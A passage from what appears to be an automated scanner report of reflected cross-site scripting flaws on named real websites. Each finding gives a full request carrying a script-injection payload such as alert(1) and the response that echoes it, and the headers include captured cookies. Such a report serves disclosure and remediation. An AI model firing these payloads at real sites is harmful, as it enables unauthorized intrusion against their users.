Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response

HTTP/1.1 404 Not Found
Connection: Close
Content-Length: 134
Content-Type: text/html; charset=iso-8859-1
Server: Barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/capmon33249<script>alert(1)</script>91aac71b8a3/GetDE</BODY></HTML>

5.144. http://tredir.go.com/capmon/GetDE [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tredir.go.com
Path:   /capmon/GetDE

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52f38<script>alert(1)</script>9f1036eb171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /capmon/GetDE52f38<script>alert(1)</script>9f1036eb171 HTTP/1.1
Host: tredir.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;

Response

HTTP/1.1 404 Not Found
Connection: Close
Content-Length: 134
Content-Type: text/html; charset=iso-8859-1
Server: Barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/capmon/GetDE52f38<script>alert(1)</script>9f1036eb171</BODY></HTML>

5.145. http://us.generation-nt.com/help/converting+mssql+mysql/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.generation-nt.com
Path:   /help/converting+mssql+mysql/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27b93<img%20src%3da%20onerror%3dalert(1)>de2cba9602e was submitted in the REST URL parameter 2. This input was echoed as 27b93<img src=a onerror=alert(1)>de2cba9602e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /help/converting+mssql+mysql27b93<img%20src%3da%20onerror%3dalert(1)>de2cba9602e/ HTTP/1.1
Host: us.generation-nt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2010 00:41:13 GMT
Server: Apache
Set-Cookie: PHPSESSID=90fbf2d190c4da3595af171eaa54a551; expires=Mon, 08 Nov 2010 00:41:13 GMT; path=/
Expires: Sun, 07 Nov 2010 00:41:13 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 07 Nov 2010 00:41:13 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml1/dtD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
   <title>Search - convertin
...[SNIP]...
<a href="/help/converting+mssql+mysql27b93%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ede2cba9602e/?or">converting mssql mysql27b93<img src=a onerror=alert(1)>de2cba9602e</a>
...[SNIP]...

5.146. http://redcated/CNT/iview/262688115/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/262688115/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a0f'%3b48a4cb73200 was submitted in the REST URL parameter 4. This input was echoed as 71a0f';48a4cb73200 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/262688115/direct71a0f'%3b48a4cb73200 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7100
Content-Type: text/html
Expires: 0
Connection: close
Date: Sat, 06 Nov 2010 17:26:13 GMT
Connection: close

<html><head><title>100909_22_UTV_THDVR_Walk_100_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/CT_9_8_2010/100909_22_UTV_THDVR_Walk_100_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/262688115/direct71a0f';48a4cb73200;ai.181693414;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/262688115/direct71a0f';48a4cb73200;ai.181693414;ct.1/01" />
...[SNIP]...

5.147. http://redcated/DEN/iview/252677534/direct/078115 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DEN/iview/252677534/direct/078115

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 741ca'%3bd720ed68176 was submitted in the REST URL parameter 4. This input was echoed as 741ca';d720ed68176 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/252677534/direct741ca'%3bd720ed68176/078115 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1289020824-462365; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6329
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 07 Nov 2010 00:42:16 GMT
Connection: close

<html><head><title>PH_hutHutHut_728x90_TM</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/DEDENPHT1SOC/Ad_Networks_Low_Creative_10_23_10/PH_hutHutHut_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/252677534/direct741ca';d720ed68176;ai.187599270;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/252677534/direct741ca';d720ed68176;ai.187599270;ct.1/01" />
...[SNIP]...

5.148. http://redcated/DEN/iview/254478378/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /DEN/iview/254478378/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e42e'%3be35830756e2 was submitted in the REST URL parameter 4. This input was echoed as 6e42e';e35830756e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DEN/iview/254478378/direct6e42e'%3be35830756e2 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1289009670-12378696; MUID=7C64E36835CB42C490BB034C0AD431C9;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6351
Content-Type: text/html
Expires: 0
Connection: close
Date: Sat, 06 Nov 2010 13:23:27 GMT
Connection: close

<html><head><title>PH_hutHutHut_728x90_ESPN_FOX</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/DEDENPHT1SOC/ESPN_Roadtrip_and_NFL_on_FOX_10_23_10/PH_hutHutHut_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/254478378/direct6e42e';e35830756e2;ai.187602637;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/254478378/direct6e42e';e35830756e2;ai.187602637;ct.1/01" />
...[SNIP]...

5.149. http://redcated/ULA/iview/265979671/direct [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /ULA/iview/265979671/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecc24'%3bac3ed86a775 was submitted in the REST URL parameter 4. This input was echoed as ecc24';ac3ed86a775 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ULA/iview/265979671/directecc24'%3bac3ed86a775 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1289020824-462365; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; ID=optout;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6253
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 07 Nov 2010 00:43:42 GMT
Connection: close

<html><head><title>flash_speedcontrolBB_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/UXULASONYSEL/SITTV/flash_speedcontrolBB_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/265979671/directecc24';ac3ed86a775;ai.186976335;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/265979671/directecc24';ac3ed86a775;ai.186976335;ct.1/01" />
...[SNIP]...

5.150. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efdc8"-alert(1)-"cb9f4d6ef72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpefdc8"-alert(1)-"cb9f4d6ef72 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 06 Nov 2010 17:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=dmj8vhf7t1i7jq7clkt9jii6j5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpefdc8"-alert(1)-"cb9f4d6ef72";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

5.151. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f03a6<script>alert(1)</script>0576009f73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpf03a6<script>alert(1)</script>0576009f73d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 06 Nov 2010 17:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e2vtlmnr1a9rli5mbavo6f0t60; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpf03a6<script>alert(1)</script>0576009f73d</strong>
...[SNIP]...

5.152. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66c63"-alert(1)-"f4525469f14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/66c63"-alert(1)-"f4525469f14 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 17:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 86592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/66c63"-alert(1)-"f4525469f14";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

5.153. http://www.cricinfo.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e2"><script>alert(1)</script>8865afff4f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e51e2"><script>alert(1)</script>8865afff4f6=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=60
Content-Type: text/html; charset=UTF-8
X-Varnish: 711005270
X-Varnish-Cache: MISS
X-Varnish: 894769522
Date: Sat, 06 Nov 2010 17:30:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci031, country: us, cluster: usa, created: 2010-11-06 17:30:27
...[SNIP]...
<div class="stryEnlarge sectionImgEn" style="padding:0;margin:0 0 0 5px;" onClick="clickMap('index','homepage',null,this,s_omni.prop4,'/ci/content/current/site/index.html?e51e2"><script>alert(1)</script>8865afff4f6=1')">
...[SNIP]...

5.154. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485657.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /australia-v-sri-lanka-2010/content/story/485657.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fcad"><script>alert(1)</script>7b256488062 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 708574769
X-Varnish-Cache: MISS
X-Varnish: 891736454
Date: Sat, 06 Nov 2010 14:03:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci034, country: us, cluster: usa, created: 2010-11-06 14:03:26
...[SNIP]...
<a href="/australia-v-sri-lanka-2010/content/story/485657.html?5fcad"><script>alert(1)</script>7b256488062=1;wrappertype=print" id="printIcon" alt="Print" title="Print">
...[SNIP]...

5.155. http://www.cricinfo.com/australia-v-sri-lanka-2010/content/story/485685.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /australia-v-sri-lanka-2010/content/story/485685.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7798c"><script>alert(1)</script>fb43bde1b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 708563898
X-Varnish-Cache: MISS
X-Varnish: 891722930
Date: Sat, 06 Nov 2010 14:02:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 151047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci030, country: us, cluster: usa, created: 2010-11-06 14:02:35
...[SNIP]...
<a href="/australia-v-sri-lanka-2010/content/story/485685.html?7798c"><script>alert(1)</script>fb43bde1b13=1;wrappertype=print" id="printIcon" alt="Print" title="Print">
...[SNIP]...

5.156. http://www.cricinfo.com/pakistan-v-south-africa-2010/content/story/485578.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricinfo.com
Path:   /pakistan-v-south-africa-2010/content/story/485578.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be18"><script>alert(1)</script>a66a096602c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1 HTTP/1.1
Host: www.cricinfo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Varnish: 708580736
X-Varnish-Cache: MISS
X-Varnish: 891743888
Date: Sat, 06 Nov 2010 14:03:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- hostname: wci029, country: us, cluster: usa, created: 2010-11-06 14:03:54
...[SNIP]...
<a href="/pakistan-v-south-africa-2010/content/story/485578.html?2be18"><script>alert(1)</script>a66a096602c=1;wrappertype=print" id="printIcon" alt="Print" title="Print">
...[SNIP]...

5.157. http://www.insightbb.com/Auth/Authpartners.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insightbb.com
Path:   /Auth/Authpartners.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38eb'%3b63f855f76c5 was submitted in the REST URL parameter 1. This input was echoed as b38eb';63f855f76c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Authb38eb'%3b63f855f76c5/Authpartners.aspx HTTP/1.1
Host: www.insightbb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=d1itev550ydlno3nt5cql555; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 06 Nov 2010 14:13:22 GMT
Connection: close
Content-Length: 46047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">

<HTML>
   <HEAD>
       <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
       <title>Insight Broadband</title>
       <script type
...[SNIP]...
           
           if(event.srcElement.name == "txtZip"){            
               if (event.keyCode==13) {                            
                   IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insightbb.com:80/error404.aspx?aspxerrorpath=/Authb38eb';63f855f76c5/Authpartners.aspx');
               }                            
           }
       }else{                        
           if (e.target.name == "txtZip"){                        
               if (e.keyCode==13) {                        
                    IsLocalZipValid('frmZip','/error404.aspx?404;http://www.insig
...[SNIP]...

5.158. http://www.insightbb.com/Auth/Authpartners.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insightbb.com
Path:   /Auth/Authpartners.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51194'%3bf833bbb8ea9 was submitted in the REST URL parameter 2. This input was echoed as 51194';f833bbb8ea9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Auth/Authpartners.aspx51194'%3bf833bbb8ea9 HTTP/1.1
Host: www.insightbb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=315cwg55bvxbbj45wbf33xm2; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 06 Nov 2010 14:13:33 GMT
Connection: close
Content-Length: 45960


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">

<HTML>
   <HEAD>
       <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
       <title>Insight Broadband</title>
       <script type
...[SNIP]...
r") {                                    
